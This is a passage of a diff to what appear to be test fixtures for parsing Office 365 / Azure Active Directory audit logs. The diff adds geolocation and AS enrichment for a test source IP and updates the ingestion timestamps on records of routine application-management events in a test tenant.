APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"
Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -11536,6 +12256,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -11702,7 +12434,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125190800Z", + "ingested": "2021-12-14T14:48:43.176721127Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"
Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -11729,6 +12461,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -11885,7 +12629,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125197800Z", + "ingested": "2021-12-14T14:48:43.176721922Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; 
Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n 
]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -11912,6 +12656,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -12068,7 +12824,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125202500Z", + "ingested": "2021-12-14T14:48:43.176722548Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; 
Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n 
]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -12095,6 +12851,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -12251,7 +13019,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125207800Z", + "ingested": "2021-12-14T14:48:43.176723156Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; 
Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"